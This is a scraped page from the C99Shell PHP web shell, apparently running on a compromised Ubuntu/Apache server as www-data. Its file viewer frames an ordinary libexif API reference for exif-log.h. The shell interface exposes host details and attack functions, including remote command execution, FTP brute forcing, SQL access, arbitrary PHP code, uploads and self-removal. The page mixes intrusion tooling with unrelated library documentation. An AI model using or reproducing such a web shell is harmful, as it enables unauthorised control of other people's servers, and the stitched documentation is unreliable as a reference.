!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/libexif-doc/libexif-api.html/   drwxr-xr-x
Free 13.21 GB of 57.97 GB (22.78%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     exif-log_8h.html (18.6 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
EXIF library (libexif) API: libexif/exif-log.h File Reference
EXIF library (libexif) API  0.6.21
exif-log.h File Reference

Log message infrastructure. More...

#include <libexif/exif-mem.h>
#include <stdarg.h>

Go to the source code of this file.

Macros

#define EXIF_LOG_NO_MEMORY(l, d, s)   exif_log ((l), EXIF_LOG_CODE_NO_MEMORY, (d), "Could not allocate %lu byte(s).", (unsigned long)(s))
 

Typedefs

typedef struct _ExifLog ExifLog
 State maintained by the logging interface.
 
typedef void(* ExifLogFunc) (ExifLog *log, ExifLogCode, const char *domain, const char *format, va_list args, void *data)
 Log callback function prototype.
 

Enumerations

enum  ExifLogCode { EXIF_LOG_CODE_NONE, EXIF_LOG_CODE_DEBUG, EXIF_LOG_CODE_NO_MEMORY, EXIF_LOG_CODE_CORRUPT_DATA }
 

Functions

ExifLogexif_log_new (void)
 Create a new logging instance. More...
 
ExifLogexif_log_new_mem (ExifMem *)
 
void exif_log_ref (ExifLog *log)
 
void exif_log_unref (ExifLog *log)
 
void exif_log_free (ExifLog *log)
 Delete instance of ExifLog. More...
 
const char * exif_log_code_get_title (ExifLogCode code)
 Return a textual description of the given class of error log. More...
 
const char * exif_log_code_get_message (ExifLogCode code)
 Return a verbose description of the given class of error log. More...
 
void exif_log_set_func (ExifLog *log, ExifLogFunc func, void *data)
 Register log callback function. More...
 
void exif_log (ExifLog *log, ExifLogCode, const char *domain, const char *format,...)
 
void exif_logv (ExifLog *log, ExifLogCode, const char *domain, const char *format, va_list args)
 

Detailed Description

Log message infrastructure.

Function Documentation

◆ exif_log_code_get_message()

const char* exif_log_code_get_message ( ExifLogCode  code)

Return a verbose description of the given class of error log.

Parameters
[in]codelogging message class
Returns
verbose description of the log class

◆ exif_log_code_get_title()

const char* exif_log_code_get_title ( ExifLogCode  code)

Return a textual description of the given class of error log.

Parameters
[in]codelogging message class
Returns
textual description of the log class

◆ exif_log_free()

void exif_log_free ( ExifLog log)

Delete instance of ExifLog.

See also
exif_log_new
Parameters
[in]logExifLog
Returns
new instance of ExifLog

◆ exif_log_new()

ExifLog* exif_log_new ( void  )

Create a new logging instance.

See also
exif_log_free
Returns
new instance of ExifLog

References exif_mem_new_default().

◆ exif_log_set_func()

void exif_log_set_func ( ExifLog log,
ExifLogFunc  func,
void *  data 
)

Register log callback function.

Calls to the log callback function are purely for diagnostic purposes.

Parameters
[in]loglogging state variable
[in]funccallback function to set
[in]datadata to pass into callback function

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--